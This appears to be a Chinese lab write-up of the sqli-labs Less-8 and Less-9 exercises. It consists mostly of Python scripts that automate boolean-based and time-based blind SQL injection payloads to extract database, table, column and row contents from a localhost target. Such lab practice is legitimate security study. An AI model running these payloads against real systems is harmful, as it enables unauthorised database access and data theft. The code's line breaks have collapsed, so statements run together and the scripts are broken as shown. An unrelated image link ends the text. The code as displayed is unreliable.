实验环境:
sqli-labs,小皮面板搭建,edge浏览器
apache:2.4.39,MySQL:5.7 PHP:5.39
Python(pycharm2023):3
less-8
布尔盲注:
1.我这里是采用最简单的直接采用一串字符串来查询的
import requestsurl = "http://localhost:8080/Less-8/"
param = "id"def getdatabase(url, param):database = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = f"{param}=1' AND SUBSTRING((SELECT database()), {i}, 1) = '{char}' -- "response = requests.get(url + "?" + payload)if "You are in..........." in response.text:database += charbreakelse:breakreturn database# 获取表名
def gettable(url, param, database):tables = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = (f"{param}=1' AND SUBSTRING((SELECT GROUP_CONCAT(table_name) "f"FROM information_schema.tables "f"WHERE table_schema = '{database}'), {i}, 1) = '{char}' -- ")response = requests.get(url + "?" + payload)if "You are in..........." in response.text:tables += charbreakelse:breakreturn tables.split(',')# 获取列名
def getcolumn(url, param, database, table):columns = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = (f"{param}=1' AND SUBSTRING((SELECT GROUP_CONCAT(column_name) "f"FROM information_schema.columns WHERE table_schema = '{database}' "f"AND table_name = '{table}'), {i}, 1) = '{char}' -- ")response = requests.get(url + "?" + payload)if "You are in..........." in response.text:columns += charbreakelse:breakreturn columns.split(',')# 获取结果
def getresult(url, param, database, table, column):result = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = (f"{param}=1' AND SUBSTRING((SELECT {column} "f"FROM {database}.{table} LIMIT 1), {i}, 1) = '{char}' -- ")response = requests.get(url + "?" + payload)if "You are in..........." in response.text:result += charbreakelse:breakreturn resultif __name__ == "__main__":database = getdatabase(url, param)print(f"Database: {database}")tables = gettable(url, param, database)print(f"Tables: {tables}")table = tables[0]columns = getcolumn(url, param, database, table)print(f"Columns: {columns}")column = columns[0]result = getresult(url, param, database, table, column)print(f"Result: {result}")
tips:我这里没有考虑有多个表和字段的情况,只是简单的把布尔盲注的原理展示了出来、
时间盲注
less-9
时间盲注:
采用时间函数,判断每个字段是否有时间差值(sleep函数)
import requests
import timedef time_based_blind_injection(url, param, payload):start_time = time.time()full_url = f"{url}?{param}={payload}"response = requests.get(full_url)end_time = time.time()if end_time - start_time > 5:return Truereturn Falsedef get_database(url, param):database = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = f"1' AND IF(SUBSTRING((SELECT database()), {i}, 1) = '{char}', SLEEP(7), 0) -- "if time_based_blind_injection(url, param, payload):database += charprint(char)breakelse:breakprint(f"[+] Database name: {database}")return database# 获取表名
def get_table(url, param, database):table = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = (f"1' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables "f"WHERE table_schema='{database}' LIMIT 0,1), {i}, 1) = '{char}', SLEEP(5), 0) -- ")if time_based_blind_injection(url, param, payload):table += charprint(f"[+] Found character: {char}")breakelse:breakprint(f"[+] Table name: {table}")return table
# def get_tables(url, param, database):当表不止一个
# tables = []
# chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
# table_count = 1 # 从第一个表开始
# while True:
# table_name = ""
# for i in range(1, 20):
# for char in chars:
# payload = (f"1' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables "
# f"WHERE table_schema='{database}' LIMIT {table_count - 1},1), {i}, 1) = '{char}', SLEEP(5), 0) -- ")
# if time_based_blind_injection(url, param, payload):
# table_name += char
# print(f"[+] table: {char}")
# break
# else:
# break
# if table_name:
# print(f"[+] Found table: {table_name}")
# tables.append(table_name)
# table_count += 1
# else:
# break
#
# return tables# 获取字段名
def get_column(url, param, table):column = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = f"1' AND IF(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='{table}' LIMIT 0,1), {i}, 1) = '{char}', SLEEP(5), 0) -- "if time_based_blind_injection(url, param, payload):column += charprint(f"[+] column: {char}")breakelse:breakprint(f"[+] Column name: {column}")return columndef get_data(url, param, table, column):data = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = f"1' AND IF(SUBSTRING((SELECT {column} FROM {table} LIMIT 0,1), {i}, 1) = '{char}', SLEEP(5), 0) -- "if time_based_blind_injection(url, param, payload):data += charprint(f"[+] Found character: {char}")breakelse:breakprint(f"[+] Data: {data}")return data# 主函数
if __name__ == "__main__":target_url = "http://localhost:8080/Less-9/"param = "id"database = get_database(target_url, param)if database:table = get_table(target_url, param, database)if table:column = get_column(target_url, param, table)if column:get_data(target_url, param, table, column)
同样没有考虑不止一个表或者列的情况
![[NGINX]nginx-rtmp-module相关配置](http://pic.xiahunao.cn/[NGINX]nginx-rtmp-module相关配置)
